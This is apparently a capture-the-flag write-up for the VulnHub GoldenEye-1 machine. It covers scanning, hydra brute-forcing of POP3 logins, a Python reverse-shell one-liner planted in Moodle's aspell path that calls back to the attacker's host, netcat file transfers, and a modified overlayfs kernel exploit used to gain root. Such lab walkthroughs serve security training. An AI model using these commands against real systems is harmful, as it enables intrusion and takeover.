Recon

NMAP Complete Scan

# Nmap 7.92 scan initiated Tue Jan 25 18:58:18 2022 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /root/vulnHub/GoldenEye-1/192.168.236.12/scans/_full_tcp_nmap.txt -oX /root/vulnHub/GoldenEye-1/192.168.236.12/scans/xml/_full_tcp_nmap.xml 192.168.236.12
adjust_timeouts2: packet supposedly had rtt of -527661 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -527661 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -527589 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -527589 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -527538 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -527538 microseconds.  Ignoring time.
Nmap scan report for 192.168.236.12
Host is up, received arp-response (0.00042s latency).
Scanned at 2022-01-25 18:58:19 +08 for 39s
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE  REASON         VERSION
25/tcp    open  smtp     syn-ack ttl 64 Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=ubuntu
| Issuer: commonName=ubuntu
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-04-24T03:22:34
| Not valid after:  2028-04-21T03:22:34
| MD5:   cd4a d178 f216 17fb 21a6 0a16 8f46 c8c6
| SHA-1: fda3 fc7b 6601 4746 96aa 0f56 b126 1c29 36e8 442c
| -----BEGIN CERTIFICATE-----
| MIICsjCCAZqgAwIBAgIJAPokpqPNVgk6MA0GCSqGSIb3DQEBCwUAMBExDzANBgNV
| BAMTBnVidW50dTAeFw0xODA0MjQwMzIyMzRaFw0yODA0MjEwMzIyMzRaMBExDzAN
| BgNVBAMTBnVidW50dTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMM6
| ryxPHxf2wYf7DNTXnW6Hc6wK+O6/3JVeWME041jJdsY2UpxRB6cTmBIv7dAOHZzL
| eSVCfH1P3IS0dvSrqkA+zpPRK3to3SuirknpbPdmsNqMG1SiKLDl01o5LBDgIpcY
| V9JNNjGaxYBlyMjvPDDvgihmJwpb81lArUqDrGJIsIH8J6tqOdLt4DGBXU62sj//
| +IUE4w6c67uMAYQD26ZZH9Op+qJ3OznCTXwmJslIHQLJx+fXG53+BLiV06EGrsOk
| ovnPmixShoaySAsoGm56IIHQUWrCQ03VYHfhCoUviEw02q8oP49PHR1twt+mdj6x
| qZOBlgwHMcWgb1Em40UCAwEAAaMNMAswCQYDVR0TBAIwADANBgkqhkiG9w0BAQsF
| AAOCAQEAfigEwPIFEL21yc3LIzPvHUIvBM5/fWEEv0t+8t5ATPfI6c2Be6xePPm6
| W3bDLDQ30UDFmZpTLgLkfAQRlu4N40rLutTHiAN6RFSdAA8FEj72cwcX99S0kGQJ
| vFCSipVd0fv0wyKLVwbXqb1+JfmepeZVxWFWjiDg+JIBT3VmozKQtrLLL/IrWxGd
| PI2swX8KxikRYskNWW1isMo2ZXXJpdQJKfikSX334D9oUnSiHcLryapCJFfQa81+
| T8rlFo0zan33r9BmA5uOUZ7VlYF4Kn5/soSE9l+JbDrDFOIOOLLILoQUVZcO6rul
| mJjFdmZE4k3QPKz1ksaCAQkQbf3OZw==
|_-----END CERTIFICATE-----
80/tcp    open  http     syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: GoldenEye Primary Admin Server
|_http-server-header: Apache/2.4.7 (Ubuntu)
55006/tcp open  ssl/pop3 syn-ack ttl 64 Dovecot pop3d
|_pop3-capabilities: RESP-CODES PIPELINING SASL(PLAIN) USER CAPA TOP AUTH-RESP-CODE UIDL
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server/emailAddress=root@localhost/organizationalUnitName=localhost
| Issuer: commonName=localhost/organizationName=Dovecot mail server/emailAddress=root@localhost/organizationalUnitName=localhost
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-04-24T03:23:52
| Not valid after:  2028-04-23T03:23:52
| MD5:   d039 2e71 c76a 2cb3 e694 ec40 7228 ec63
| SHA-1: 9d6a 92eb 5f9f e9ba 6cbd dc93 55fa 5754 219b 0b77
| -----BEGIN CERTIFICATE-----
| MIIDnTCCAoWgAwIBAgIJAOZHv9ZnCiJ+MA0GCSqGSIb3DQEBCwUAMGUxHDAaBgNV
| BAoME0RvdmVjb3QgbWFpbCBzZXJ2ZXIxEjAQBgNVBAsMCWxvY2FsaG9zdDESMBAG
| A1UEAwwJbG9jYWxob3N0MR0wGwYJKoZIhvcNAQkBFg5yb290QGxvY2FsaG9zdDAe
| Fw0xODA0MjQwMzIzNTJaFw0yODA0MjMwMzIzNTJaMGUxHDAaBgNVBAoME0RvdmVj
| b3QgbWFpbCBzZXJ2ZXIxEjAQBgNVBAsMCWxvY2FsaG9zdDESMBAGA1UEAwwJbG9j
| YWxob3N0MR0wGwYJKoZIhvcNAQkBFg5yb290QGxvY2FsaG9zdDCCASIwDQYJKoZI
| hvcNAQEBBQADggEPADCCAQoCggEBAMo64gzxBeOvt+rgUQncWU2OJESGR5YJ9Mcd
| h0nF6m0o+zXwvkSx+SW5I3I/mpJugQfsc2lW4txo3xoAbvVgc2kpkkna8ojodTS3
| iUyKXwN3y2KG/jyBcrH+rZcs5FIpt5tDB/F1Uj0cdAUZ+J/v2NEw1w+KjlX2D0Zr
| xpgnJszmEMJ3DxNBc8+JiROMT7V8iYu9/Cd8ulAdS8lSPFE+M9/gZBsRbzRWD3D/
| OtDaPzBTlb6es4NfrfPBanD7zc8hwNL5AypUG/dUhn3k3rjUNplIlVD1lSesI+wM
| 9bIIVo3IFQEqiNnTdFVz4+EOr8hI7SBzsXTOrxtH23NQ6MrGbLUCAwEAAaNQME4w
| HQYDVR0OBBYEFFGO3VTitI69jNHsQzOz/7wwmdfaMB8GA1UdIwQYMBaAFFGO3VTi
| tI69jNHsQzOz/7wwmdfaMAwGA1UdEwQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEB
| AMm4cTA4oSLGXG+wwiJWD/2UjXta7XAAzXofrDfkRmjyPhMTsuwzfUbU+hHsVjCi
| CsjV6LkVxedX4+EQZ+wSa6lXdn/0xlNOk5VpMjYkvff0ODTGTmRrKgZV3L7K/p45
| FI1/vD6ziNUlaTzKFPkmW59oGkdXfdJ06Y7uo7WQALn2FI2ZKecDSK0LonWnA61a
| +gXFctOYRnyMtwiaU2+U49O8/vSDzcyF0wD5ltydCAqCdMTeeo+9DNa2u2IOZ4so
| yPyR+bfnTC45hue/yiyOfzDkBeCGBqXFYcox+EUm0CPESYYNk1siFjjDVUNjPGmm
| e1/vPH7tRtldZFSfflyHUsA=
|_-----END CERTIFICATE-----
55007/tcp open  pop3     syn-ack ttl 64 Dovecot pop3d
|_pop3-capabilities: RESP-CODES SASL(PLAIN) CAPA AUTH-RESP-CODE PIPELINING USER TOP STLS UIDL
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server/emailAddress=root@localhost/organizationalUnitName=localhost
| Issuer: commonName=localhost/organizationName=Dovecot mail server/emailAddress=root@localhost/organizationalUnitName=localhost
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-04-24T03:23:52
| Not valid after:  2028-04-23T03:23:52
| MD5:   d039 2e71 c76a 2cb3 e694 ec40 7228 ec63
| SHA-1: 9d6a 92eb 5f9f e9ba 6cbd dc93 55fa 5754 219b 0b77
| -----BEGIN CERTIFICATE-----
| MIIDnTCCAoWgAwIBAgIJAOZHv9ZnCiJ+MA0GCSqGSIb3DQEBCwUAMGUxHDAaBgNV
| BAoME0RvdmVjb3QgbWFpbCBzZXJ2ZXIxEjAQBgNVBAsMCWxvY2FsaG9zdDESMBAG
| A1UEAwwJbG9jYWxob3N0MR0wGwYJKoZIhvcNAQkBFg5yb290QGxvY2FsaG9zdDAe
| Fw0xODA0MjQwMzIzNTJaFw0yODA0MjMwMzIzNTJaMGUxHDAaBgNVBAoME0RvdmVj
| b3QgbWFpbCBzZXJ2ZXIxEjAQBgNVBAsMCWxvY2FsaG9zdDESMBAGA1UEAwwJbG9j
| YWxob3N0MR0wGwYJKoZIhvcNAQkBFg5yb290QGxvY2FsaG9zdDCCASIwDQYJKoZI
| hvcNAQEBBQADggEPADCCAQoCggEBAMo64gzxBeOvt+rgUQncWU2OJESGR5YJ9Mcd
| h0nF6m0o+zXwvkSx+SW5I3I/mpJugQfsc2lW4txo3xoAbvVgc2kpkkna8ojodTS3
| iUyKXwN3y2KG/jyBcrH+rZcs5FIpt5tDB/F1Uj0cdAUZ+J/v2NEw1w+KjlX2D0Zr
| xpgnJszmEMJ3DxNBc8+JiROMT7V8iYu9/Cd8ulAdS8lSPFE+M9/gZBsRbzRWD3D/
| OtDaPzBTlb6es4NfrfPBanD7zc8hwNL5AypUG/dUhn3k3rjUNplIlVD1lSesI+wM
| 9bIIVo3IFQEqiNnTdFVz4+EOr8hI7SBzsXTOrxtH23NQ6MrGbLUCAwEAAaNQME4w
| HQYDVR0OBBYEFFGO3VTitI69jNHsQzOz/7wwmdfaMB8GA1UdIwQYMBaAFFGO3VTi
| tI69jNHsQzOz/7wwmdfaMAwGA1UdEwQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEB
| AMm4cTA4oSLGXG+wwiJWD/2UjXta7XAAzXofrDfkRmjyPhMTsuwzfUbU+hHsVjCi
| CsjV6LkVxedX4+EQZ+wSa6lXdn/0xlNOk5VpMjYkvff0ODTGTmRrKgZV3L7K/p45
| FI1/vD6ziNUlaTzKFPkmW59oGkdXfdJ06Y7uo7WQALn2FI2ZKecDSK0LonWnA61a
| +gXFctOYRnyMtwiaU2+U49O8/vSDzcyF0wD5ltydCAqCdMTeeo+9DNa2u2IOZ4so
| yPyR+bfnTC45hue/yiyOfzDkBeCGBqXFYcox+EUm0CPESYYNk1siFjjDVUNjPGmm
| e1/vPH7tRtldZFSfflyHUsA=
|_-----END CERTIFICATE-----
MAC Address: 08:00:27:FD:62:53 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=1/25%OT=25%CT=1%CU=%PV=Y%DS=1%DC=D%G=N%M=080027%TM=61E
OS:FD7F2%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10C%TI=Z%CI=I%II=I%TS=8
OS:)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B
OS:4ST11NW7%O6=M5B4ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120
OS:)ECN(R=Y%DF=Y%TG=40%W=7210%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%TG=40%S=O%A=
OS:S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%
OS:Q=)T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%TG=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1
OS:(R=N)IE(R=Y%DFI=N%TG=40%CD=S)

Uptime guess: 198.840 days (since Sat Jul 10 22:49:03 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE
HOP RTT     ADDRESS
1   0.42 ms 192.168.236.12

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 25 18:58:58 2022 -- 1 IP address (1 host up) scanned in 40.64 seconds

TCP/80 (HTTP)

FFUF

┌──(root💀kali)-[~/vulnHub/GoldenEye-1/192.168.236.12]
└─# ffuf -u http://192.168.236.12/FUZZ -w /usr/share/wordlists/dirb/common.txt -e '.html,.txt,.php' -fw 21

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.236.12/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/common.txt
 :: Extensions       : .html .txt .php 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response words: 21
________________________________________________

                        [Status: 200, Size: 252, Words: 10, Lines: 12]
index.html              [Status: 200, Size: 252, Words: 10, Lines: 12]
:: Progress: [18460/18460] :: Job [1/1] :: 5715 req/sec :: Duration: [0:00:03] :: Errors: 0 ::

index.html

Nikto

┌──(root💀kali)-[~/vulnHub/GoldenEye-1/192.168.236.12]
└─#             nikto -ask=no -h http://192.168.236.12:80 2>&1 | tee "/root/vulnHub/GoldenEye-1/192.168.236.12/scans/tcp80/tcp_80_http_nikto.txt"
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.236.12
+ Target Hostname:    192.168.236.12
+ Target Port:        80
+ Start Time:         2022-01-27 19:16:29 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: fc, size: 56aba821be9ed, mtime: gzip
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.24
+ /splashAdmin.php: Cobalt Qube 3 admin is running. This may have multiple security problems as described by www.scan-associates.net. These could not be tested remotely.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2022-01-27 19:17:22 (GMT8) (53 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

splashAdmin.php
Cobalt Qube 3 admin

Initial Foothold

TCP/80 (HTTP) - Hidden Directory & Text

View to enumerated directories
- index.html
  - sev-home
  - terminal.js
- /sev-home
  - Basic Authentication
- terminal.js
  - Boris
    - Encoded password
    - Default password
- splashAdmin.php
  - List of users
    - boris/Boris
    - janus/Janus
    - admin/Admin
    - natalya/Natalya
    - xenia/Xenia
  - Cobalt Qube 3 has been decomissioned
Search exploits for Cobalt Qube 3
Exploit Title Path
Cobalt Qube 3.0 - Authentication Bypass php/webapps/21640.txt
- Exploit did not work
Decode password
- boris:InvincibleHack3r
Proceed to /sev-home & login
TCP/55007 - POP3 - Bruteforce + Access Emails

Exploit Title	Path
Cobalt Qube 3.0 - Authentication Bypass	php/webapps/21640.txt

Bruteforce POP3

 ┌──(root💀kali)-[~/vulnHub/GoldenEye-1/192.168.236.12/exploit/http]
 └─# hydra -l boris -P /usr/share/wordlists/fasttrack.txt pop3://$ip:55007 -e nsr
 [DATA] attacking pop3://192.168.236.12:55007/
 [STATUS] 80.00 tries/min, 80 tries in 00:01h, 142 to do in 00:02h, 16 active
 [STATUS] 64.00 tries/min, 128 tries in 00:02h, 94 to do in 00:02h, 16 active
 [55007][pop3] host: 192.168.236.12   login: boris   password: secret1!

boris:secret1!

Access SMTP w/ Thunderbird
View boris’s emails
- alec@janus.boss
  - No attached files
- natalya@ubuntu
- root@127.0.0.1.goldeneye
New users
- alec
- natalya
- root

Bruteforce POP3 again

 ┌──(root💀kali)-[~/vulnHub/GoldenEye-1/192.168.236.12/exploit/smtp]
 └─# hydra -L usernames.txt -P /usr/share/wordlists/fasttrack.txt pop3://$ip:55007 -e nsr -t 10
 [55007][pop3] host: 192.168.236.12   login: natalya   password: bird

natalya:bird

View natalya’s emails
- root@ubuntu
  - severnaya-station.com/gnocertdir
  - xenia:RCP90rulez!

Back to TCP/80 - Obtain More Creds

Add severnaya-station.com to /etc/hosts

 ┌──(root💀kali)-[~/vulnHub/GoldenEye-1/192.168.236.12/exploit/cobalt]
 └─# echo "192.168.236.12 severnaya-station.com" >> /etc/hosts

Proceed to /gnocertdir
- Login w/ xenia:RCP90rulez!
- moodle
Search for moodle version
- Source
- Moodle >1.9.7

Search for exploits

Exploit Title	Path
Moodle 3.8 - Unrestricted File Upload (2019)	php/webapps/49114.txt
Moodle 3.9 - Remote Code Execution (RCE) (Authenticated) (2021)	php/webapps/50180.py
Moodle 3.4.1 - Remote Code Execution	php/webapps/46551.php
Moodle 2.x/3.x - SQL Injection	php/webapps/41828.php

None of the exploits worked

View xenia’s messages
- doak

Back to TCP/55007 - POP3

Bruteforce POP3 again

 ┌──(root💀kali)-[~/vulnHub/GoldenEye-1/192.168.236.12/exploit/smtp]
 └─# hydra -l doak -P /usr/share/wordlists/fasttrack.txt pop3://$ip:55007 -e nsr -t 10 -I
	
 [55007][pop3] host: 192.168.236.12   login: doak   password: goat

doak:goat

View doak’s emails
- doak@ubuntu
- dr_doak:4England!

Back to TCP/80 - Obtain More Creds + Moodle CMS Exploit (RCE)

Login w/ dr_doak:4England! & proceed to private files
View s3cret.txt
- /dir007key/for-007.jpg
Download /dir007key/for-007.jpg

Detect any hidden files/text

 ┌──(root💀kali)-[~/vulnHub/GoldenEye-1/192.168.236.12/loot/http]
 └─# exiftool for-007.jpg | grep Description
 Image Description               : eFdpbnRlcjE5OTV4IQ==

Decode text

 ┌──(root💀kali)-[~/vulnHub/GoldenEye-1/192.168.236.12/loot/http]
 └─# echo -n eFdpbnRlcjE5OTV4IQ== | base64 -d
 xWinter1995x!

admin:xWinter1995x!

Login w/ admin:xWinter1995x!
- No Private Files
- No Messages
View moodle version
- moodle 2.2.3
Insert reverse shell
1. Proceed to Site Administration -> Server -> System Paths
2. Edit Path to aspell
  1 python -c 'a=__import__;s=a("socket").socket;o=a("os").dup2;p=a("pty").spawn;c=s();c.connect(("192.168.236.4",4444));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")'
  - Only python reverse shell worked
3. Proceed to Site Administration -> Plugins -> Text Editor -> TinyMCE editor
4. Change Spell engine to PSpellShell
5. Execute reverse shell by creating a post & toggling spell check
Obtain www-data shell
Credentials we have so far
Username Password
boris InvincibleHack3r
boris secret1!
natalya bird
xenia RCP90rulez!
doak goat
dr_doak 4England!
admin xWinter1995x!
alec ?

Username	Password
boris	InvincibleHack3r
boris	secret1!
natalya	bird
xenia	RCP90rulez!
doak	goat
dr_doak	4England!
admin	xWinter1995x!
alec	?

Privilege Escalation

Rabbit Hole - SQL Creds

Obtain usernames
Obtain MySQL creds
- moodle:trevelyan006x
- It uses psql instead of mysql

Access psql

 www-data@ubuntu:/home$ psql -U moodle -h 127.0.0.1 moodle
 Password for user moodle: 
 psql (9.3.22)
 SSL connection (cipher: DHE-RSA-AES256-GCM-SHA384, bits: 256)
 Type "help" for help.

 moodle=> \l
                                   List of databases
    Name    |  Owner   | Encoding |   Collate   |    Ctype    |   Access privileges   
 -----------+----------+----------+-------------+-------------+-----------------------
  moodle    | moodle   | UTF8     | en_US.UTF-8 | en_US.UTF-8 | 
  postgres  | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | 
  template0 | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres          +
            |          |          |             |             | postgres=CTc/postgres
  template1 | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres          +
            |          |          |             |             | postgres=CTc/postgres
	
 moodle=> \c moodle
 SSL connection (cipher: DHE-RSA-AES256-GCM-SHA384, bits: 256)
 You are now connected to database "moodle" as user "moodle".
	
 moodle=> SELECT username, password FROM mdl_user;
  guest    | aca21c6dbd0538a171ff16550b873d70
  boris    | efaf365b88dee2fc2029ff20674658a7
  natalya  | 7a442035ba13c5d22e1e163e2117eb0d
  xenia    | 116672a0e281b6aa277ef78f53a5f6f9
  dr_doak  | 488e0292fac2386d877e80f2e3a203bf
  admin    | de51800b0404d41fcb51203f1e3e524a

Crack hashes

 ┌──(root💀kali)-[~/vulnHub/GoldenEye-1/192.168.236.12/loot/sql]
 └─# cut -d "|" -f2 sqlcreds | cut -d " " -f2 > hashes

 ┌──(root💀kali)-[~/vulnHub/GoldenEye-1/192.168.236.12/loot/sql]
 └─# hashcat -a 0 -m 0 hashes /usr/share/wordlists/rockyou.txt  --show

Failed to crack

Root - Via Kernel Exploit

Linpeas

Find exploit for linux 3.13.0-32

Exploit Title	Path
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - ‘overlayfs’ Local Privilege Escalation	linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - ‘overlayfs’ Local Privilege Escalation (Access /etc/shadow)	linux/local/37293.txt

Use linux/local/37292.c

Since we do not have gcc on the target, we have to compile on our kali

Compile 37292.c on kali

 ┌──(root💀kali)-[~/vulnHub/GoldenEye-1/192.168.236.12/exploit/kerne1]
 └─# gcc -m64 37292.c -o exploit

Transfer to target

 ┌──(root💀kali)-[~/vulnHub/GoldenEye-1/192.168.236.12/exploit/kerne1]
 └─# nc -nvlp 4444 < exploit 
 Ncat: Version 7.92 ( https://nmap.org/ncat )
 Ncat: Listening on :::4444
 Ncat: Listening on 0.0.0.0:4444
		
 www-data@ubuntu:/tmp/kernel_exploit$ nc 192.168.236.4 4444 > exploit

Run exploit on target

 www-data@ubuntu:/tmp/kernel_exploit$ ./exploit
 spawning threads
 mount #1
 mount #2
 child threads done
 /etc/ld.so.preload created
 creating shared library
 sh: 1: gcc: not found
 couldn't create dynamic library
 www-data@ubuntu:/tmp/kernel_exploit$ 

/etc/ld.so.preload is created on target
/tmp/ofs-lib.c is created on target

Transfer /tmp/ofs-lib.c to kali

┌──(root💀kali)-[~/vulnHub/GoldenEye-1/192.168.236.12/exploit/kerne1]
└─# nc -nvlp 4444 > ofs-lib.c
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
		
www-data@ubuntu:/tmp/kernel_exploit$ nc 192.168.236.4 4444 < /tmp/ofs-lib.c

Compile /tmp/ofs-lib.c on kali

gcc -m64 -fPIC -shared -o ofs-lib.so ofs-lib.c -ldl -w

Remove Line 138-147 from 37292.c

Recompile 37292.c

 ┌──(root💀kali)-[~/vulnHub/GoldenEye-1/192.168.236.12/exploit/kerne1]
 └─# rm exploit 
		
 ┌──(root💀kali)-[~/vulnHub/GoldenEye-1/192.168.236.12/exploit/kerne1]
 └─# gcc -m64 37292.c -o exploitNew
 37292.c: In function ‘main’:
 ...

Transfer exploitNew & ofs-lib.so to target

 # Transfer ofs-lib.so
 ┌──(root💀kali)-[~/vulnHub/GoldenEye-1/192.168.236.12/exploit/kerne1]
 └─# nc -nvlp 4444 < ofs-lib.so
 Ncat: Version 7.92 ( https://nmap.org/ncat )
 Ncat: Listening on :::4444
 Ncat: Listening on 0.0.0.0:4444
		
 www-data@ubuntu:/tmp/kernel_exploit$ nc 192.168.236.4 4444 > /tmp/ofs-lib.so
		
 # Transfer exploitNew
 ┌──(root💀kali)-[~/vulnHub/GoldenEye-1/192.168.236.12/exploit/kerne1]
 └─# nc -nvlp 4444 < exploitNew
 Ncat: Version 7.92 ( https://nmap.org/ncat )
 Ncat: Listening on :::4444
 Ncat: Listening on 0.0.0.0:4444

 www-data@ubuntu:/tmp/kernel_exploit$ nc 192.168.236.4 4444 > exploitNew

Run exploit on target again
1 2 chmod +x exploitNew ./exploitNew

Root Flag

 # cat .flag.txt
 Alec told me to place the codes here: 

 568628e0d993b1973adc718237da6e93

 If you captured this make sure to go here.....
 /006-final/xvf7-flag/

 # 

After reading writeups, you can just change gcc to cc in 37292.c

Vulnhub - GoldenEye 1